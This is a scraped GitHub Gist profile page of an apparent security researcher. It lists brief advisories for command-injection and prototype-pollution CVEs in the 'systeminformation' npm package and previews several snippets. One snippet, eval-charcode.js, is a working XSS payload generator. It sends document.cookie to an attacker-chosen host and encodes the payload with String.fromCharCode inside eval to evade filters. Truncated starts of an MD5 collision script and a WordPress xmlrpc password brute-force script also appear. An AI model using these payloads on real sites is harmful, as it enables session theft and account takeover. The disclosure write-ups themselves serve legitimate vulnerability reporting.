Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Renan Rocha EffectRenan

🎯
Focusing
View GitHub Profile
@EffectRenan
EffectRenan / CVE-2020-26274.md
Last active Dec 19, 2020
[systeminformation] - Command Injection
View CVE-2020-26274.md

Vulnerability: Command Injection - CVE-2020-26274

Package name: systeminformation.

Tested package versions: 4.31.0.

Fixed package versions: >= 4.31.1.

Description: The attacker can send an OS command into quotation marks and it going to be executed.

@EffectRenan
EffectRenan / CVE-2020-7778, CVE-2020-26245.md
Last active Dec 16, 2020
[systeminformation] - Prototype Pollution
View CVE-2020-7778, CVE-2020-26245.md

Vulnerability: Prototype Pollution - CVE-2020-7778, CVE-2020-26245

Package name: systeminformation.

Tested package versions: 4.30.1, 4.30.2, 4.30.4

Fixed package versions: >= 4.30.5

Description: The attacker can overwrite the properties and functions of an object. It can lead to executing OS commands.

@EffectRenan
EffectRenan / CVE-2020-7752.md
Last active Nov 12, 2020
systeminformation - Command Injection
View CVE-2020-7752.md
View eval-charcode.js
function generate(host, com) {
const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com;
let encoded = command[0].charCodeAt();
for (var i = 1; i < command.length; i++) {
encoded += ',' + command[i].charCodeAt();
}
encoded = `eval(String.fromCharCode(${encoded}))`;
console.log(encoded);
return encoded;
View MD5-collision.py
# -*- coding: utf-8 -*-
import multiprocessing
import hashlib
import random
import string
import sys
CHARS = string.letters + string.digits
def cmp_md5(substr, stop_event, str_len, start=0, size=20):
global CHARS
while not stop_event.is_set():
View xmlrpc-bruteforce.sh
#!/bin/bash
if [[ $1 == '' || $2 == '' ]]
then
echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>"
exit
fi
USER="admin"